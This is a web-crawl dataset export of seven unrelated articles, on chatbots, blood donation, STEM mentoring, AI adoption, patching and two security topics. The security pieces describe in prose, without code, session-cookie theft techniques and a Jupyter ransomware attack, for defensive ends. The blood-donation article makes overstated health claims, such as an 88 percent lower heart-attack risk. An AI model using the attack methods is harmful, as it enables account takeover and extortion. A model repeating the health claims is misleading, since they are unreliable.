text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
By Bryan Timm What are Microsoft virtual agents? Virtual agents are chatbots that can live on your website and interact with your visitors. Chatbots – also known as “conversational agents” – are applications that mimic written or spoken human speech for the purposes of simulating a conversation or interaction with a real person. There are two primary ways chatbots are offered to visitors: via web-based applications or standalone apps. Chatbots have been around forever, dating back to the 1960s, and are not a new concept to most. As end users and consumers, we have been seeing them implemented more and more – on websites and social media. It is estimated by Gartner that by 2022 70% of white-collar workers with interact with a chatbot on a daily basis. Chatbots are AI-powered applications that help companies power conversations. Did you know these chatbots can do more than just chat? Recently, my colleague, Michael Orellana, walked through the Power Platform offerings from Microsoft. One of these, Power Virtual Agents, can be used to empower your employees and automate a variety of tasks. From a deployment perspective, the biggest problem with chatbots was the long build process and extensive development knowledge required to build these. Microsoft Virtual Agents introduce a new way to deploy chatbots. Power Virtual Agents allow you to use low or no-code solutions to produce stunning results. A Virtual Agent can be built to allow full phrase user input or present the user with choices to guide them to the end of a process, such as onboarding a new user. The customizable topics, Virtual Agent’s version of workflows, can be driven by a variety of Power applications all at once, including Virtual Agent, Power Apps, Power BI, and Power Automate. It allows you to connect to over 350 existing connectors and let your chatbot talk to their back-end systems in a few clicks – everything from MailChimp to Salesforce to Zendesk. There are many ways to use a Virtual Agent. The possibilities are nearly limitless with what you can build, including tools to assist with onboarding, knowledgebase articles, service guides, and reporting. Let's look at these use cases. Leveraging Power Automate with a connection to Azure Active Directory, a user would be able to initiate a chat with the Virtual Agent and create a new user – all from inside Microsoft Teams. With this Virtual Agent, you can accomplish a variety of the tasks that come with onboarding a new user such as: creating the new user account, assigning them a 365 license, or updating their contact information. These automations can be built with approvals as well that automatically reach out to identified stakeholders. There are limitless possibilities to how you could expand upon this, such as connecting to a SharePoint library and being able to have one-click access to send out new hire documentation. Have you ever visited a knowledge-base site for a product and been overwhelmed by the amount of information? You're not alone. Imagine having a guided chat with a Virtual Agent who would be able to get you information about a limitless number of topics. This information would be mobile, too, through the Microsoft Teams app available on iOS and Android. You can also enable your chatbot to field your typical customer service questions, such as business hours, product information, pricing, or collecting information for a quote. An employee in the field would be empowered to be an instant expert with all the information they need at their fingertips. This includes providing them with images, links, or even just step-by-step instructions. Armed with the tools available through a Virtual Agent, a new employee will not feel as new when he goes on-site to a new client for the first time. Service teams could leverage a Virtual Agent for other uses as well, such as letting the team know where they are at while on-the-go. A service technician could check in with the Virtual Agent, and the team manager could use this information to keep track of the team's activities. Virtual Agents can be linked to several data sources, including Microsoft’s Power BI. This allows the agent to take advantage of pre-built reports and would allow the chatbot to query the user for which type of report they want to run and then send it to the user via email. Conversely, you could use a Virtual Agent to input data as well. This data can then be automated to route to a data source, a SharePoint list, or even just output to an email. Recently, a request came in to query a third-party data source, by leveraging their public API. The user can now enter the service tag from the manufacturer into Teams, and have it return the warranty status and information. Information from client sites can be captured on the go by enabling a Virtual Agent to route information inputted through the Teams mobile app to the appropriate fields in another database, such as Power BI. Imagine simplifying the inventory process by utilizing a Virtual Agent to collect and update information as you move throughout your warehouse, store, or even just your garage workspace. What happens when the Virtual Agent is not able to assist? Build your virtual agent to hand off escalations to live agents through Dynamics 365 Omnichannel for Customer Service. Alternatively, you can connect it to a variety of chat providers. It can even feed information already given to the chatbot and route it to the agent. Built-in analytics allow management to view how their chatbot is performing. You can monitor trends across where the bot is deployed, identify any areas for improvement, and increase the Virtual Agent’s productivity by measuring how well it is doing with survey information. The San Diego Workforce Partnership utilized Virtual Agents to take their response to the COVID-19 pandemic. With everything and everyone moving remote, Workforce Partnership employees were able to increase collaboration and engage with more people in need of support. By leveraging a Power Virtual Agent, they were able to make sure people get help from the right person right away. Creating your first bot requires you to have a license (or trial) to Power Virtual Agents. Agents can be built right into Microsoft Teams. To get started, you’ll need to walk through a few steps in Teams. If this is the first time a bot is being created in your team, you'll see a notice explaining that it will take some time (this could take from 1 to 10 minutes): Agents are powered by Topics, or pre-built conversations that you can have with the Virtual Agent. You will see below some of the default topics included with every bot, including a path for escalation to a real agent. You can configure the agent to be response based and look for trigger phrases, keyboards, or questions that a user is likely to use or you can configure it to present preset answers as needed throughout the interaction. For example, if a user asked “What are your hours?” to a chatbot for a retail organization, and you had a topic configured to respond to the trigger hours, then it could respond with your hours, as well as asking if they would like a store representative to call them to assist with any questions. Chat with an expert about your business’s technology needs.
<urn:uuid:e096c4e5-90f2-40d1-971c-8bedcc024c57>
CC-MAIN-2024-38
https://www.managedsolution.com/tag/power-platform/
2024-09-12T19:07:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00312.warc.gz
en
0.952629
1,495
2.546875
3
Blood Donation - Information & Importance of Blood Donation History of Blood Donation The earliest documentation of blood transfusion is found in the religious text of many civilizations. The first documented demonstration of blood transfusion was between two dogs by Richard Lower in 1665. Landsteiner discovered the ABO Blood Group system in 1901, which is one of the most important landmark discoveries in the Transfusion Medicine. In the 1970s voluntary donors were accepted as blood donors. These donors were later on found to people having high-risk activities and the recipients were found to be suffering from liver diseases. This lead to another discovery of Hepatitis-B transmitted by donated blood. Since then testing for the hepatitis B antigen was implemented and this together with the cessation of paid donors reduced the incidence of post transfusion hepatitis. Further studies also made us include tests for Malaria, Syphilis, AIDS, and Hepatitis C to make the donated blood as safe as possible to the recipient. What is blood? One can almost say that blood is that magic potion which gives life to another person. Though we have made tremendous discoveries and inventions in Science we are not yet able to make the magic potion called Blood. Human blood has no substitute. The requirement of safe blood is increasing and regular voluntary blood donations are vital for blood transfusion services. Why donate blood? Do you know, someone in the US needs blood every two seconds, so donating blood is a phenomenal choice of doing a good deed. More than 41,000 blood donations are needed each day, and because blood cannot be manufactured, the only way to supply this need is via generous blood donors. Who can donate blood? The eligibility criteria for blood donation is simple. A donor should be between 18-55 years of age with a weight of 50 kg or above with pulse rate, body temperature, and blood pressure should be normal. Both men and women can donate blood. There are only a few conditions in which donors are permanently excluded. The donor with a history of epilepsy, psychotic disorders, abnormal bleeding tendencies, severe asthma, cardiovascular disorders, malignancy is permanently unfit for blood donation. Donors suffering from diseases like hepatitis, malaria, measles, mumps, and syphilis may donate blood after full recovery with 3-6 months gap. Also, people who have undergone surgery or blood transfusion may safely donate blood after 6-12 months for woman donors who are pregnant or lactating blood is not taken as their iron reserves are already on the lower side. How much blood can be taken during blood donation? Our body has 5.5 liters of the blood, out of which only 350 ml to 450 ml of blood is taken depending upon the weight of donor. The majority of healthy adults can tolerate withdrawal of one unit of blood. The withdrawn blood volume is restored within 24 hours and the hemoglobin and cell components are restored in 2 months. Therefore it is safe to donate blood every three months. What is done with the blood collected? The blood is collected in sterile, pyrogen free containers with anticoagulants like CPDA or CPDA with SAGM. This prevents clotting and provides nutrition for the cells. This blood is stored at 2-6 C or -20 C depending on the component prepared. Donated blood undergoes various tests like blood grouping antibody detection, testing of infections like hepatitis, AIDS, Malaria, syphilis and before it reaches the recipient it undergoes compatibility testing with the recipient blood. Modern Blood Transfusion Practice Modern blood transfusion basically deals with the optimal use of one unit of blood. One unit of whole blood is separated into components making it available to different patients according to their requirement. Thus one unit of blood is converted into packed cell volume, fresh frozen plasma, platelet concentrate, cryoprecipitate and granulocytes concentrate. Another important practice is apheresis. This is the separation of only desired component from the donor and returns the remaining constituent back to the donor. This technique is also used for remaining pathological substance in patients. Withdrawal of blood for transfusion is regarded as a safe procedure now and blood donor has emerged as the single most vital link. Health Benefits of Blood Donation There are many benefits of blood donation to your health. Some are mentioned below. - Blood donors have been found to be 88 percent less likely to suffer from a heart attack. - Donating blood keeps the balance of Iron Levels in your blood. For each unit of blood donated, you lose about one-quarter of a gram of iron. You may think this is a bad thing, since iron-deficiency may lead to fatigue, decreased immunity, or anemia, which can be serious if left untreated but what many people fail to realize is that too much iron can be worse, and is actually far more common than iron deficiency. - Repeated blood donations may help your blood to flow better, possibly helping to limit damage to the lining of your blood vessels, which should result in fewer arterial blockages. - Blood donors are less likely to get heart attacks, strokes, cancers, and people who volunteer for altruistic reasons (those help others rather than themselves), appear to live longer than those who volunteer for more self-centered reasons. - Repeated blood donations may reduce your risk of getting diabetes. - The satisfaction that you get after donation cannot be expressed. It can only be felt. It is said that God loves a cheerful giver.
<urn:uuid:2d359ef7-fd47-41f5-9f56-fcb4d790699f>
CC-MAIN-2024-38
https://www.knowledgepublisher.com/article/335/blood-donation-information-importance-of-blood-donation.html
2024-09-14T00:56:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00212.warc.gz
en
0.943111
1,118
3.125
3
The following post was originally published in The Hill In 1961, President John F. Kennedy laid out an ambitious goal for our nation – to land a man on the moon by the end of the decade. In doing so, he inspired a new generation and helped ensure U.S. global leadership in technology for years to come. Today, we have an earthbound, but no less important, challenge. We face a massive skills gap — by 2018, our nation will have 1.8 million unfilled jobs requiring technical skills. Our nation’s business community is uniting to address the challenge. We need to make sure that students of all backgrounds have the skills and opportunities to pursue a career in STEM– Science, Technology, Engineering, and Math. This requires a national strategy, a chief component of which is STEM mentoring by STEM professionals. Why mentoring? Because students won’t do what they can’t see. It’s one thing to teach math and science in the classroom. It’s another thing to build, explore, and engage the incredible world of science and technology that is transforming our society in real-time. Hands-on learning is the way to get a diverse group of students excited about STEM. Cisco – as a founding member of US2020 – has pledged that 20 percent of our U.S. workforce will participate in STEM mentoring by the year 2020. Over the course of the past two years, we have engaged over 2,500 U.S. employee volunteers who have spent 28,000 hours working with students. The results have been amazing for students and employees. And through a combination of data-driven analysis and anecdotal stories, we have developed 6 keys to engage and energize our executives and employees, to drive STEM mentoring. 1. Make mentoring accessible. If you ask your employees to volunteer at a local school or community-based program, a handful of dedicated individuals will engage. On the other hand, if you bring local students to your facility, and provide volunteers with a sensible agenda and curriculum, the results will be tremendous. More importantly, the students will experience a STEM workplace first-hand and you will help build a culture of engagement, where employees mentor again and again and again. 2. Measure and report impact. The last thing you want is for employees to leave a STEM mentoring engagement without understanding the difference they’ve made. So we’ve made it a practice to survey the students who go through our programs, first when they come in and, later, after they leave. In a recent survey, we asked students, “Do you know what it takes to get a job in STEM?” The initial response was very strong, with over 50 percent indicating agreement. But when asked again after the curriculum was completed, the numbers jumped sky-high — 90 percent indicated agreement. These types of engagement numbers inspire students and employees alike. 3. Tug at the heartstrings and create an emotional connection. Employees will volunteer for a variety of reasons, but we find that sharing stories of engagement – both in terms of students and of mentors makes an enormous difference. “The experience makes me a better father,” one employee told us after he’d spent a few hours connecting with high school students about the possibilities of a career in STEM — science, technology, engineering and math — at a company-sponsored event. He’s one of 82 percent of employees who said they find it personally rewarding to mentor, and 73 percent who said it made them proud to work for our company. 4. Engage senior executives. In any company, it is crucial to find executive sponsors who support the mission. This is important for a variety of reasons, not the least of which is that most mentoring programs occur during the workday. For the last major event we held at Cisco, our executive sponsors were the global head of sales, who has now been named the CEO, and the Chief Financial Officer. This sends a very clear signal that mentoring is a business priority, in addition to being the right thing to do. 5. Connect it to your business. As we developed our mentoring curriculum, we linked it to our business priorities. When we engage students, we have a strong focus on engineering, and lay out a skills challenge related to developing new ideas associated with the Internet of Everything. This helps generate excitement, expertise, and leads to more fulfilling engagements for students and employees alike. Each company that engages in STEM mentoring should find their own niche and connection to their business. 6. Partner with effective community organizations. We engage with amazing organizations like the Girl Scouts, Junior Achievement and US FIRST Robotics. They help connect us with local schools and school districts, and are instrumental in bringing students to our campuses. Many companies don’t have dedicated staff to drive STEM mentoring, so connecting with the right organizations in the local community is absolutely critical. STEM mentoring isn’t a panacea. It won’t solve the skills gap crisis by itself, and it certainly won’t do it overnight. But it is a critical piece of a larger STEM strategy that we must embrace. This time it’s not about going to the moon. In some ways, it’s about something more – opening the eyes of millions of young students to a universe of incredible opportunities. Kirsten Weeks was is a featured speaker at the White House STEM Mentoring Symposium held in Washington, DC, on July 23, 2015.
<urn:uuid:66319119-5a62-4ec4-9b07-214f32709a4b>
CC-MAIN-2024-38
https://blogs.cisco.com/csr/engineering-a-stem-mentoring-moonshot
2024-09-07T23:14:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00812.warc.gz
en
0.955968
1,140
2.59375
3
In the past few years, we have witnessed a significant shift in the attack landscape, from stealing clear text credentials to targeting session-based authentication. This trend is driven by the proliferation of multi-factor authentication (MFA), which makes it harder for attackers to compromise accounts with just passwords. However, MFA is not a silver bullet, and post-authentication materials like session tokens, cookies, API keys and machine certificates can still be exploited to bypass authentication and gain access to sensitive systems and data. In this blog post, I will share some of our red team insights and explain how session-based attacks are evolving beyond the web browser. I will also recommend ways for organizations to protect themselves from these threats and reduce their attack surfaces. What Are Post-Authentication Attacks and Why Are They Dangerous? Post-authentication attacks are a type of attack that targets the authentication tokens that are used to maintain a user’s or a machine’s identity and access rights after the initial login process. These tokens can take various forms, such as cookies, API keys, machine certificates and OAuth tokens. They are often stored in the browser, in files, in memory or in databases and are transmitted over the network when a user or a machine interacts with a web application or an API. The main advantage of session-based attacks for the attackers is that because they happen after the authentication phase and the user is already validated, they can bypass MFA and other security controls applied at the login stage. An attacker can impersonate the user or the machine and access their authorized resources by stealing or forging a valid session token (via the Golden Ticket or Golden SAML attack technique). Moreover, session tokens are often long-lived and have broad privileges, meaning the attacker can maintain persistence and move laterally within the network. How Post-Authentication Threats Are Evolving Amid the Expanding Attack Surface The most well-known and common form of post-authentication attack is cookie stealing, which involves capturing or manipulating the cookies used by web browsers to authenticate users to web applications. Cookies are session tokens issued to the web server after users log in with their credentials and MFA and are stored in the browser. The browser then sends the cookies along with every request to the web server, which validates them and grants access to the user. Cookie stealing can be performed in various ways, such as: - Exploiting vulnerabilities in the web application or the browser, such as cross-site scripting (XSS), cross-site request forgery (CSRF) or XML external entity (XXE) injection, that allow the attacker to execute malicious code or requests on behalf of the user and access their cookies. - Sniffing or intercepting the network traffic between the user and the web server and extracting the cookies from the HTTP headers. This can be done by compromising the user’s device, the web server or any intermediate node on the network, such as a router, a proxy or a firewall. - Accessing the browser’s storage, where the cookies are saved, and copying them to the attacker’s device. This can be done by exploiting the user’s device or by tricking the user into downloading a malicious browser extension, a file or software that can read the browser’s storage. - Scraping the browser process memory space, some cookies are stored as session cookies, which means they are not written to disk and exist only within the browser memory as ephemeral cookies for the duration of the session and as long as the browser is open. Since the browsers are designed to run as unprivileged applications, any other program with the same level of access (unprivileged) can read the browser memory. As you can see, cookies are key security material and are thought out by threat actors. If you were to eliminate cookies from the browser, the experience would become more secure. And that’s no longer a hypothetical scenario, with the arrival of our recently released, identity-centric CyberArk Secure Browser – an industry first (and which our red team helped develop). The browser eliminates the writing of cookies to a device’s disk, which means there are no cookies for attackers to steal. By eliminating cookies from the disk, organizations can help protect themselves from certain types of session-based attacks that rely on stealing cookies to bypass the authentication process. However, cookies are not the only form of session token that session-based attacks can target. As web applications and APIs become more complex and diverse, and as more machines and devices communicate with each other over the internet, other forms of session tokens are emerging and becoming more prevalent. These include: - API keys, which are secret tokens that are used to authenticate and authorize machines or programmatic users to access APIs. API keys are often used for programmatic or automated interactions with cloud services, such as spinning up virtual machines, accessing storage buckets or sending notifications. API keys are usually stored in files or databases and transmitted over the network as HTTP headers or parameters. - Machine certificates, which are digital certificates that are used to authenticate and authorize the communication between machines or devices. Machine certificates, such as VPNs, HTTPS or SSH, are often used to secure connections between servers, clients and IoT devices. Machine certificates are usually stored in files or hardware modules and are transmitted over the network as part of the TLS handshake. - OAuth tokens, which are tokens that are used to delegate access to third-party applications or services. OAuth tokens are often used for social login, where a user can sign in to a web application using their existing account from another platform, such as Google, Facebook or X (née Twitter). OAuth tokens are usually stored in the browser or databases and transmitted over the network as HTTP headers or parameters. These session tokens are also vulnerable to session-based attacks and can be stolen or forged by attackers in ways similar to cookies. For example: - API keys can be exposed by vulnerabilities in the API or the client, by network sniffing or interception – or by accessing the files or databases where they are stored - Machine certificates can be compromised by vulnerabilities in the TLS protocol or the implementation, network sniffing or interception or accessing the files or hardware modules where they are stored. - OAuth tokens can be hijacked by vulnerabilities in the OAuth protocol or the implementation, network sniffing or interception or accessing the browser or databases where they are stored. (A recent example of this is APT29’s attack on Microsoft, where the attackers breached a legacy test OAuth application and then created a series of malicious OAuth apps, which enabled them to gain further access. This ultimately allowed the attackers to access certain corporate email accounts.) How Organizations Can Help Protect Themselves From Post-Authentication Attacks Post-authentication attacks are a serious and growing threat, and organizations need to take proactive measures to protect themselves and their users from these attacks. Some of the best practices and recommendations that organizations can follow are: - Implement the principle of least privilege (PoLP) and limit the scope and duration of the session tokens. Session tokens should only grant the minimum access rights needed, when needed (just-in-time), for the specific task or interaction and should expire or be revoked as soon as possible. This can reduce the impact and the risk of session token compromise. - Enforce strong encryption and integrity checks on the network communication and the session tokens. Session tokens should be encrypted and signed by the issuer and transmitted only over secure channels, such as HTTPS or TLS. This can prevent the attackers from sniffing, intercepting or tampering with them. - Monitor and audit the usage and activity of session tokens. The issuer should log and track session tokens and any abnormal or suspicious behavior, such as multiple or concurrent logins, unusual locations or devices or anomalous requests or actions, should be detected and alerted. This can help organizations identify and respond to session token compromise. - Educate and train the users and the developers on the risks and the best practices of session token security. Users should be aware of the dangers of phishing, malware and social engineering and avoid clicking on suspicious links, downloading unknown files or sharing their session tokens with anyone. Developers should be familiar with the latest session token security standards and guidelines and follow secure coding and testing practices. With attackers relentlessly finding new ways to exploit them, post-authentication attacks are a complex and evolving challenge. Organizations must be prepared and vigilant to defend themselves from these threats by implementing security measures such as least privilege, monitoring and maintaining an assume breach mindset. Additionally, solutions such as CyberArk Secure Browser, which completely eliminates cookies from the disk, can provide an added layer of protection. Shay Nahari is VP of CyberArk Red Team Services. Editor’s note: For more insights from Shay Nahari on this subject, secure web browsing and beyond, listen to the April 2024 CyberArk Trust Issues podcast episode, “Secure Browsing and Session-Based Threats.” The episode is available in the player below and on most major podcast platforms.
<urn:uuid:cf857a60-76e6-4e7d-8fda-293c28cdd571>
CC-MAIN-2024-38
https://www.cyberark.com/resources/blog/cookies-beyond-browsers-how-session-based-attacks-are-evolving
2024-09-08T01:18:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00812.warc.gz
en
0.924927
1,872
2.625
3
Cybersecurity is a big, scary word with big, scary implications. The word conjures mental images of a dark room and someone in front a dimly lit computer. The black screen flashes green and is dotted with lines of code entered by a nameless, faceless “cyberterrorist” – a hacker – with a smirk and an evil laugh. Are hackers merely the digital age’s version of a pirate ship on the high seas, with the sought-after treasure in the updated form of digital profit? The reality, though, is far scarier: data security is big business, and with every business venture comes big risk. You’ve worked hard to get where you are. Your business is growing, and the truth is this makes you a target. Any vulnerability is an unfortunate side effect of success, and with this comes fear – fear of losing everything you’ve built. Hackers spend hours trying to uncover these vulnerabilities and exploit them, sometimes for profit or ransom or just to cause damage. How do these hackers do this? Hackers obtain access to a computer and plant “malware,” malicious software, like a virus or another executable program. The purpose of these programs varies, but the shared nature is they’re not meant to help anyone but the hacker. In some cases, the idea is to have this malware operate undetected – but not always. - One of the most famous hackers today is “Anonymous,” an international group that has become well-known for DDOS (distributed denial-of-service) attacks on government, religious, and corporate websites. Every day, hackers are finding new ways to attack, and are sometimes successful simply because those they attack just haven’t yet applied available security updates, called patches. A patch is a corrective action to address a specific vulnerability. A critical patch update – a CPU – is a series of patches released at the same time that resolve security vulnerabilities. Often when a CPU is released, it’s in response to a discovered vulnerability, sometimes hackers already exploiting the weakness. Organizations will accompany a CPU with a statement of disclosure of these vulnerabilities and the solution within the CPU. No matter the reason, a CPU shouldn’t be delayed. For example, Oracle recently released a patch for select products, including its WebLogic Server. Oracle discovered a vulnerability affecting WLS Security, allowing attackers to exploit access resulting in a successful takeover of the server. For what is considered to be the industry’s best application server with features for lowering operational costs while improving performance, this vulnerability reflects an urgent need for users to update. In Q4 2017, Oracle released a security alert notifying customers of affected Oracle products and strongly advised that the CPU released in October be applied immediately. - Oracle patch CVE-2017-3506 addressed WebLogic’s “Web Services” subcomponent - Oracle patch CVE-2017-10271 addressed WebLogic’s “WLS Security” subcomponent – a critical Java deserialization vulnerability - Impacted WebLogic versions: 10.3.6.0.0, 126.96.36.199.0, 188.8.131.52.0, or 184.108.40.206.0 More details on this were not publicly available until December when Oracle announced that the vulnerability would have allowed unauthorized users to gain remote access and takeover. How was this discovered? Logically, hackers placed a script on affected servers that unintentionally “killed,” or prevented the servers from functioning – possibly even alerting some of the intended targets of the attack before the attack had the chance to deploy fully. In this specific case, one widely-shared thought is that hackers were exploiting this weakness to install software that mines bitcoins on the affected servers. One element that makes this situation unique is that only limited coding knowledge was needed to make this hacking effort a success if fully and properly deployed. - What is bitcoin mining? Specialized software is used to solve complex math problems in exchange for an amount of bitcoin currency. Why does this matter? If this activity is taking place as a result of a hacker accessing your server, and this hacker now has control of your data, everything is at risk. In most cases, bitcoin mining on a regular computer didn’t allow the generation of enough of the currency to offset the power consumption cost, making this an unappealing option for bitcoin miners. If you read between these lines, hacking someone else’s machine is a better target since the hacker isn’t paying the power bill! Imagine if, instead of just one computer for a single user, you utilize a cloud-based solution for your entire business, and a hacker was able to access your incredibly powerful resource for their benefit – compromising your data. What would be the impact on your business if this data library became lost? What does all of this mean? First, it means we strongly recommend a thorough security review to protect yourself, your business, and your data. Next, it’s vital to remain vigilant after a patch is installed, and investigate further. If one hack attempt is successful, more importantly by a less-sophisticated hacker, then a more skilled “cyberterrorist” is likely in a better position to gain even stronger control over your system. Is there an upside? The good news is that cybersecurity is an increasingly critical component of today’s business model, and the industry is growing – as is the pool of candidates and the knowledge base within. The evolution of cybersecurity is a byproduct of the ever-evolving world of technology, and those organizations that focus on the latest trends and the newest solutions are supporting the strength of the field. - Standards are being established across the technology industry, laws are being written to protect digital and intellectual property, and crimes are being prosecuted. - Precedents are being established with which to fight cyberterrorism and hackers, in numbers great or small. What can you do? The best thing you can do for your business – and thus, yourself – is to employ a top arsenal of experts that can aid you in protection against cyber attacks. Remember that even the best efforts need ongoing support. The key to long-term success is to work with experts that understand your needs and the nature of your business in such a way that there is a seamless relationship: Where you end, your “cybersecurity expert” begins, and eliminates any vulnerabilities. When customers ask you what the secret of your success is, you can honestly answer that you only work with the best – and that’s the best position to be in for the future.
<urn:uuid:bd4f5b63-d894-423e-b415-a7f144559078>
CC-MAIN-2024-38
https://digivie.com/the-oracle-for-cybersecurity/
2024-09-09T04:36:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00712.warc.gz
en
0.944183
1,390
3.0625
3
In the last year, artificial intelligence (AI) has become the hot topic in technology and, of course, our society. It is in the process of transforming the way we work and live. The new era of AI is being compared to significant advancements like the industrial revolution, the introduction of calculators, and the widespread use of the internet. It is not solely focused on technological areas but is permeating the lives of everyone on the planet. We can see the impact on shopping, traveling, search engines, our ever-connected phones, and governments. For the average person, AI has shifted from a complex unknown technology to simply a part of everyday life. For organizations, both in the private and public sectors, visionary leaders are looking to harness AI technology to provide efficiency at orders of magnitude greater than ever thought possible. The challenge, however, is to adopt these capabilities reasonably and in the most economical way. Arguably, Microsoft with its strategic partnerships like OpenAI, has taken the lead in the era of AI. Microsoft has provided a path for organizations to harness the previously extremely expensive and complex AI technology to focus on their own data and processes. Unlike many of the initial publicly available iterations of Generative AI (OpenAI’s ChatGPT) that promote the democratization of AI engines, Microsoft within its Cognitive Services area of the Azure public cloud has empowered organizations to infer their proprietary data upon the many different types of Generative AI (e.g., Large Language Models (LLMs), Image Synthesis Models, etc.). With this new technology, one of the key concerns within society is the ethical and proper use of AI. In this area, for several years, Microsoft has also provided guidance for the era of AI with their defining responsible AI utilization with six primary principles: - Accountability: People should be accountable for AI systems - Transparency: AI systems should be understandable - Fairness: AI systems should treat all people fairly - Reliability and safety: AI systems should perform reliably and safely - Privacy and security: AI systems should be secure and respect privacy - Inclusiveness: AI systems should empower everyone and engage people Additionally, Microsoft has provided guidance and additional tooling in operationalizing the adoption of AI within organizations, both in the public and private sectors. Most recently, Microsoft has provided insight into an upcoming framework – AI Literacy, Governance, and Technology (AGT) – as a guide initially focused on government organizations, but very applicable to private sector organizations, as well. Not surprisingly, the Data and AI practice at Planet Technologies in conjunction with its unique You Already Own It (YAOI) program, has also provided cloud strategy sessions focused on Microsoft Azure OpenAI in the same type of outline, AI Literacy, Governance, and Technology. This approach provides the ability for organizations of all types to quickly come up to speed in adopting AI in their strategy and vision. The outline Microsoft provided as a preview on October 1, 2023, aligns closely with the success Planet Technologies has had in assisting key customers in adopting AI within the Azure Cognitive Services umbrella in multiple successful engagements. It is also no surprise that Planet Technologies was designated as a Charter Member of Microsoft’s Content AI Partner Program. Referring to the preview of the AGT Framework Outline, below are the following areas that will provide a roadmap for organizations to adopt proprietary AI technologies quickly, efficiently, and properly. - AI Literacy a. Understanding Generative AI b. Exploring the Potential and Pitfalls of Generative AI c. Assessing Generative AI Outputs d. Engaging with Generative AI Systems e. Crafting Generative AI Models f. Deciphering Generative AI Outputs g. Collaborative Creating with Generative AI a. Policy Framework for Generative AI b. Legal Compliance and Ethical Standards c. Data Governance d. Accountability and Transparency e. Risk Management f. Performance Monitoring and Evaluation g. Public Engagement and Awareness a. Core Technologies of Generative AI b. Infrastructure Essentials c. Security, Privacy, and Compliance d. Integration and Standardization e. Development Environments and Tooling It is important to note that the actual adoption of AI technology within the organization is listed last and after ensuring both an understanding of AI and a proper governance structure is in place. Lastly, it is important to realize that we are still on the cusp of understanding all the possible use cases that utilize AI. Transparently, Planet Technologies is seeing and assisting customers with many use cases including, but not limited to, education, secure research, defense industrial base (DIB), and government. If your organization is looking to explore adopting AI, especially utilizing Microsoft technologies (e.g., Azure OpenAI, Copilot, etc.), Planet is available to review and assist you and your organization.
<urn:uuid:b5485ab0-62ca-4331-8e95-ddf13c08d7a2>
CC-MAIN-2024-38
http://info.go-planet.com/perspectives-blog/getting-ahead-with-ai-revolutionizing-organizations/
2024-09-10T11:28:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00612.warc.gz
en
0.932489
1,003
2.71875
3
Team Nautilus has uncovered a Python-based ransomware attack that, for the first time, was targeting Jupyter Notebook, a popular tool used by data practitioners. The attackers gained initial access via misconfigured environments, then ran a ransomware script that encrypts every file on a given path on the server and deletes itself after execution to conceal the attack. Since Jupyter notebooks are used to analyze data and build data models, this attack can lead to significant damage to organizations if these environments aren’t properly backed up. What is Jupyter Notebook? The Jupyter Notebook is an open source web application used by data professionals to work with data, write and execute code, and visualize the results. Normally, access to the online application should be restricted, either with a token or password or by limiting ingress traffic. However, sometimes these notebooks are left exposed to the internet with no authentication means, allowing anyone to easily access the notebook via a web browser. On top of this, a built-in feature of Jupyter notebooks enables the user to open a shell terminal with further access to the server. Breaking down the Jupyter Notebook ransomware attack To conduct the attack, the adversary accessed the server via a misconfigured application, downloaded the libraries and tools that support the attack (for example, encryptors), and then manually created a ransomware script by pasting the Python code and executing the script. Below, you can see the actual code that was used during the attack on our honeypot: Our honeypot was designed to simulate a real-life enterprise environment, so it included actual Jupyter notebooks and raw data files that the attacker could encrypt. The attack stopped before it could cause more damage. We decided to simulate and investigate the attack in our lab. In the screenshot below, you can see the execution of the encryptor. Note that the Python file (cpt.py) was designed to delete itself after execution to conceal the attack. No ransom note was presented in this attack. We assume that either the adversary was experimenting with the attack on our machine, or the honeypot timed out before the attack was completed. Overall, this attack is simple and straightforward, as opposed to more sophisticated ransomware that uses advanced techniques, such as Locky, Ryuk, WannaCry, or ransomware-as-a-service such as GandCrab. We also suspect that we might be familiar with the attacker due to the unique trademark that was used. In the beginning of the attack, the adversary checked if the server was vulnerable by downloading to /tmp directory a text file named f1gl6i6z. This file contains the word ‘bl*t’, which might indicate that the threat actor has Russian origin. We’ve seen this file used before in many cryptomining attacks that target Jupyter notebooks and JupyterLab environments. A quick Shodan query shows that there are about 200 internet-facing Jupyter notebooks with no authentication. Naturally, some of them can be honeypots, but not all. We think that this attack can indicate a campaign that executes ransomware on these servers. Using Tracee to detect the attack Our honeypots are continually monitored by Tracee of Aqua Security, an open source runtime security and forensics tool for Linux, built to address common Linux security issues. On GitHub, you can find Tracee-eBPF, a Linux tracing and forensics tool based on eBPF technology, and Tracee-rules, a runtime security detection engine that allows to detect malicious events. In this attack, Tracee detected two drift events: dropping and execution on the fly of a binary and a Python file. Although a “living off the land” approach — using the existing tools in a target environment — is common, attackers are often looking to bring in and apply their own tools. Tracee was designed to detect these kinds of events. In this case, the attacker downloaded a nano binary to create the file cpt.py and executed this binary along with the cpt.py script. These specific detections aren’t available in the open source Tracee-rules, but are included in Aqua’s Cloud Native Detection and Response (CNDR) solution that allows to detect and prevent attacks in runtime. Read more about CNDR’s detection capabilities and how CNDR stopped a DeamBus botnet attack. Mapping the attack to the MITRE ATT&CK framework Here we map each component of the attack to the corresponding techniques of the MITRE ATT&CK framework: What actions you should take There are a few recommendations you can follow to mitigate these risks and protect your data applications. Jupyter Notebook recommendations - Use token or another authentication method to control access to your data development application. - Ensure that you’re using SSL to protect data in transit. - Limit inbound traffic to the application either by blocking the internet access completely or, if the environment requires internet access, by using network rules or VPN to control inbound traffic. It’s also recommended to limit outbound access. For instance, in the Aqua platform, you can set network rules to limit access to your resources. - Run your applications with a non-privileged user or one with limited privileges. - Make sure you know all the Jupyter notebook users. You can query the users in an Sqlite3 database, which should be found in this path: 